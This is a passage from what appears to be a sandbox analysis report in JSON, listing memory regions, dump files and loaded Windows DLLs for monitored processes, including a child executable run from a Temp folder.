"private_memory", "start_va": 2146762752, "timestamp": "00:00:54.685", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000974-addr_0x000000007ff60000-size_0x0000000000050000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 327680, "start_va": 2146828288, "type": "region", "version": 1 }, "end_va": 2147155967, "entry_point": 0, "filename": null, "id": "region_974", "name": "private_0x000000007ff60000", "norm_filename": null, "region_type": "private_memory", "start_va": 2146828288, "timestamp": "00:00:54.685", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000975-addr_0x000000007ffd7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_975", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:00:54.686", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000976-addr_0x0000000004760000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74842112, "type": "region", "version": 1 }, "end_va": 74907647, "entry_point": 0, "filename": null, "id": "region_976", "name": "private_0x0000000004760000", "norm_filename": null, "region_type": "private_memory", "start_va": 74842112, "timestamp": "00:00:54.892", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000981-addr_0x0000000004770000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 74907648, "type": "region", "version": 1 }, "end_va": 75694079, "entry_point": 0, "filename": null, "id": "region_981", "name": "private_0x0000000004770000", "norm_filename": null, "region_type": "private_memory", "start_va": 74907648, "timestamp": "00:00:54.914", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000985-addr_0x00000000047f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 75431936, "type": "region", "version": 1 }, "end_va": 75694079, "entry_point": 0, "filename": null, "id": "region_985", "name": "private_0x00000000047f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75431936, "timestamp": "00:00:54.943", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000986-addr_0x00000000052e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 86900736, "type": "region", "version": 1 }, "end_va": 87162879, "entry_point": 0, "filename": null, "id": "region_986", "name": "private_0x00000000052e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 86900736, "timestamp": "00:00:55.023", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000989-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_989", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:00:55.024", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000995-addr_0x00000000051d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 85786624, "type": "region", "version": 1 }, "end_va": 86835199, "entry_point": 0, "filename": null, "id": "region_995", "name": "private_0x00000000051d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 85786624, "timestamp": "00:00:55.077", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000996-addr_0x0000000005350000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 87359488, "type": "region", "version": 1 }, "end_va": 87621631, "entry_point": 0, "filename": null, "id": "region_996", "name": "private_0x0000000005350000", "norm_filename": null, "region_type": "private_memory", "start_va": 87359488, "timestamp": "00:00:55.077", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000998-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_998", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:55.078", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000999-addr_0x0000000005390000-size_0x00000000000e0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 917504, "start_va": 87621632, "type": "region", "version": 1 }, "end_va": 88539135, "entry_point": 0, "filename": null, "id": "region_999", "name": "private_0x0000000005390000", "norm_filename": null, "region_type": "private_memory", "start_va": 87621632, "timestamp": "00:00:55.079", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001002-addr_0x0000000005390000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 87621632, "type": "region", "version": 1 }, "end_va": 88276991, "entry_point": 0, "filename": null, "id": "region_1002", "name": "private_0x0000000005390000", "norm_filename": null, "region_type": "private_memory", "start_va": 87621632, "timestamp": "00:00:55.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001003-addr_0x0000000005430000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 88276992, "type": "region", "version": 1 }, "end_va": 88539135, "entry_point": 0, "filename": null, "id": "region_1003", "name": "private_0x0000000005430000", "norm_filename": null, "region_type": "private_memory", "start_va": 88276992, "timestamp": "00:00:55.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001053-addr_0x0000000004790000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 75038720, "type": "region", "version": 1 }, "end_va": 75104255, "entry_point": 0, "filename": null, "id": "region_1053", "name": "private_0x0000000004790000", "norm_filename": null, "region_type": "private_memory", "start_va": 75038720, "timestamp": "00:00:57.240", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", "filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "id": "proc_6", "image_name": "lambdoidtegument.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00001004-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1004", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:57.013", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001005-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1005", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:57.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_1006", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:57.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4435967, "entry_point": 4194304, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", "id": "region_1007", "name": "lambdoidtegument.exe", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:57.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1008", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1009", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1010", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001011-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1011", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001012-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1012", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1013", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:57.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1014", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:57.094", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001015-addr_0x00000000001c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_1015", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:57.095", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001016-addr_0x00000000005f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6291455, "entry_point": 0, "filename": null, "id": "region_1016", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:00:57.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1388544, "start_va": 1922301952, "type": "region", "version": 1 }, "end_va": 1923690495, "entry_point": 1922301952, "filename": "\\Windows\\System32\\msvbvm60.dll", "id": "region_1017", "name": "msvbvm60.dll", "norm_filename": "c:\\windows\\system32\\msvbvm60.dll", "region_type": "memory_mapped_file", "start_va": 1922301952, "timestamp": "00:00:57.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1018", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1019", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1020", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1021", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1022", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1023", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1024", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1025", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1026", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1027", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1028", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1029", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1030", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3702783, "entry_point": 0, "filename": null, "id": "region_1031", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:00:57.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1032", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:57.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1033", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:57.136", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001034-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1034", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001035-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1035", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5509119, "entry_point": 0, "filename": null, "id": "region_1036", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 18874367, "entry_point": 0, "filename": null, "id": "region_1037", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001038-addr_0x0000000001200000-size_0x0000000000110000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1114112, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19988479, "entry_point": 0, "filename": null, "id": "region_1038", "name": "private_0x0000000001200000", "norm_filename": null, "region_type": "private_memory", "start_va": 18874368, "timestamp": "00:00:57.167", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001039-addr_0x0000000001310000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 19988480, "type": "region", "version": 1 }, "end_va": 24182783, "entry_point": 0, "filename": null, "id": "region_1039", "name": "private_0x0000000001310000", "norm_filename": null, "region_type": "private_memory", "start_va": 19988480, "timestamp": "00:00:57.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 24182784, "type": "region", "version": 1 }, "end_va": 27127807, "entry_point": 24182784, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1040", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 24182784, "timestamp": "00:00:57.173", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001041-addr_0x0000000000550000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_1041", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:00:57.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001042-addr_0x00000000019e0000-size_0x00000000001c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1835008, "start_va": 27131904, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, "filename": null, "id": "region_1042", "name": "private_0x00000000019e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27131904, "timestamp": "00:00:57.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], 